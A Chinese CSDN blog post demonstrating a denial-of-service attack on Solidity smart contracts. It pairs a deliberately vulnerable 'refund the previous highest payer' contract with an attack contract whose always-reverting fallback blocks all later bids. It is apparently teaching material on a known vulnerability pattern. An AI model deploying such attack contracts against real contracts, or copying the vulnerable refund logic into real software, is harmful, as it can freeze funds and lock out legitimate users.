solidity合约DOS攻击

最新推荐文章于 2024-06-12 12:34:14 发布
最新推荐文章于 2024-06-12 12:34:14 发布
阅读量4.7k 收藏 2
点赞数 1
分类专栏: 智能合约 文章标签: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38935605/article/details/124300721
版权 
pragma solidity ^0.5.1;
//业务逻辑,谁给的钱多我就记录谁,并且把上个人的钱退回去
contract longTest2{
    
    address payable add;
    uint256 public code;

    function setAdd()public payable returns(uint256){
        require(msg.value > code);
        require(add.send(code));
        code = msg.value;
        add = msg.sender;
        return code;
    }
}



pragma solidity ^0.5.1;
interface Aunt{
    function setAdd()external payable;
}
//攻击合约
contract longTest{
    Aunt auntPas = Aunt(0xB302F922B24420f3A3048ddDC4E2761CE37Ea098);
    function set()public payable {
         auntPas.setAdd.value(msg.value)();
    }

    //写个回滚函数,我给出去一次钱一后后面给的钱多的人无法调用,意思就是我钱已经给了,你退回来我不要
    function() external payable{
        revert();
    }
}

破 风
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Hash碰撞进行DoS攻击
zhaohong_bo的专栏
05-22 1851
一、哈希表碰撞攻击的基本原理 哈希表是一种查找效率极高的数据结构,很多语言都在内部实现了哈希表。PHP中的哈希表是一种极为重要的数据结构,不但用于表示Array数据类型,还在Zend虚拟机内部用于存储上下文环境信息(执行上下文的变量及函数均使用哈希表结构存储)。 理想情况下哈希表插入和查找操作的时间复杂度均为O(1),任何一个数据项可以在一个与哈希表长度无关的时间内计算出一个哈希值(key),然后...
智能合约安全陷阱和开发建议
Ethan Zhang
07-09 3071
Solidity作为一种图灵完备的高级语言,可以支持逻辑比较复杂的智能合约的编写。一般情况下,Solidity开发者可以根据自己的意愿和预期开发一个智能合约项目。同时也不能保证,没有黑客攻击的存在。因此呢,确保安全性在Solidity开发中极为重要。 今天我们要介绍的常见智能合约安全陷阱包括如下: 函数可重入 跨函数资源共享 整数溢出漏洞 gas限制和循环 tx.orign和msg.sender...
solidity智能合约[51]-安全—dos***
weixin_33862188的博客
11-29 158
Dos***dos***也叫做拒绝服务***,通过使程序操作无效完成***的目的。下面的一段合约是2016年KotET(“纷争时代”)合约,其遭受了dos***。本小节将揭开此合约被***的秘密。源代码在下面KotET合约代码中,模拟了争夺皇位的功能。只有出价最高的人才能够夺得桂冠。 合约中的bid方法正是最核心的竞价合约。只有当msg.value即附带的以太币大于当前最大的...
【100个Solidity使用技巧】2、交易回滚攻击
qq_41943430的博客
08-13 595
【100个Solidity使用技巧】2、交易回滚攻击
智能合约审计之DDOS概述
Fly_鹏程万里
07-16 1141
拒绝服务(DOS) 对智能合约进行DOS攻击的方法有很多种,其根本的目的是使合约在一段时间内或者永久无法正常运行,通过拒绝服务攻击,也可以使合约中的ether永远无法提取出来,下面将会列出几种常见的攻击场景: 未设定Gas费用的外部调用 在这种情况下,您可能希望对未知合同进行外部调用并继续处理事务,而不管该调用是否失败,通常通过call操作码来实现的,如果调用失败,调用操作码不会还原事务(有关更多详细信息和示例) 案例分析 下面我们考虑一个简单的例子,我们有一个钱包合约,当调用withdraw(.
solidity合约案例.zip
03-26
solidity案例
2024solidity智能合约开发零基础精细化入门教程
05-09
Solidity是一种静态类型、面向合约的高级编程语言,专门为编写智能合约而设计,它被用于eth和其他兼容区块链平台。 Solidity语言受到了C++、Python和JavaScript等语言的影响,旨在提供一种安全、易于理解的方式来...
基于FISCO BCOS 开发的solidity 智能合约DEMO
11-14
基于FISCO BCOS 开发的solidity 智能合约 DEMO 仅供参考
Solidity编写智能合约(入门)
01-27
Solidity中,一个合约由一组代码(合约的函数)和数据(合约的状态)组成。合约位于以太坊区块链上的一个特殊地址。uint storedData;这行代码声明了一个状态变量,变量名为storedData,类型为uint (256bits无符号...
智能合约漏洞攻击事件_智能合约百科全书攻击漏洞
weixin_26747751的博客
09-14 6121
智能合约漏洞攻击事件Applications on Ethereum manage financial value, making security absolutely crucial. As a nascent, experimental technology, smart contracts have certainly had their fair share of attacks. 以太...
解密智能合约TOP10安全漏洞
softgmx的博客
11-22 1万+
以下都是来自我的新作《解密EVM机制及合约安全漏洞》里的内容 电子版PDF下载:https://download.csdn.net/download/softgmx/10800947   重入问题 漏洞成立的条件: 合约调用带有足够的gas 有转账功能(payable) 状态变量在重入函数调用之后 底层转账函数 防重入 错误处理 ...
solidity智能合约编程(进阶)
HurryPotter
05-19 547
1)合约转账三种方式: 1. address.transfer(uint256 acount):失败抛出异常(触发revert),发送2300gas,不可调节; 2. address.send((uint256 acount):失败返回false,发送2300gas,不可调节; 3. address.call.value(uint256 acount)():失败返回false,发送全部gas,可调节(.gas(uint256 gasAmount)); 2)tx.origin与msg.sender区别:
Solidity中memory在0.5和0.4不同版本的区别
终生学习
05-23 1521
Solidity中memory在0.5和0.4不同版本用法有些区别, 0.5的string变量需要在传值的时候加上memory 以下是0.4版本代码: pragma solidity ^0.4.4; contract a1 { string _name; function a1(string name) { _name = name; } funct...
go-ethereum-code-analysis 以太坊源码分析
热门推荐
omnispace的博客
02-11 1万+
分析go-ethereum的过程,我希望从依赖比较少的底层技术组件开始,慢慢深入到核心逻辑。目录go-ethereum代码阅读环境搭建以太坊黄皮书 符号索引rlp源码解析trie源码分析ethdb源码分析rpc源码分析p2p源码分析eth协议源码分析core源码分析区块链索引 chain_indexer源码分析布隆过滤器索引 bloombits源码分析以太坊的trie树管理 回滚等操作 state...
以太坊智能合约Solidity的0.5
u012310362的博客
10-15 2086
Solidity v0.5.0重大变化 注意 使用Solidity v0.5.0编译的合约仍然可以与合约甚至是使用旧版本编译的库进行交互,而无需重新编译或重新部署它们。更改接口以包括数据位置和可见性以及可变性说明符就足够了。 仅语义更改 本节列出了仅语义的更改,因此可能隐藏现有代码中的新行为和不同行为。 • 有符号右移现在使用适当的算术移位,即向负无穷大舍入,而不是向零舍入。有符号和无符号的转换将...
solidity0.5.x笔记(1)-值类型
Ethan Zhang
04-30 765
值类型和引用类型的区别 Solidity变量类型分为两大类——值类型、引用类型 值类型:变量的存储空间存的是变量的数据 引用类型:变量的存储空间存的是变量数据所在的存储空间的地址 **注意:**值传递和引用传递。值类型的变量,赋值是简单的值传递,即两个变量占有独立的存储区域。引用类型赋值传递的是变量的引用,即两个变量指向同一存储区域 值类型——布尔 (bool) bool: 只有两种值true...
Solidity(5)
sunniy27的博客
12-21 3756
1.合约Solidity合约有点类似面向对象语言中的类。合约中有用于数据持久化的状态变量(state variables),和可以操作他们的函数。调用另一个合约实例的函数时,会执行一个EVM函数调用,这个操作会切换执行时的上下文,这样,前一个合约的状态变量(state variables)就不能访问了。1.1 创建合约IDEs,例如Remix,UI更好。通过使用JavaScript API web
2024年科技趋势与未来展望
最新发布
qqk808的博客
06-12 1320
2024年科技趋势与未来展望
solidity合约案例
05-11
以下是一个简单的 Solidity 合约案例: ``` pragma solidity ^0.8.0; contract HelloWorld { string message; constructor() { message = "Hello, World!"; } function getMessage() public view returns ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值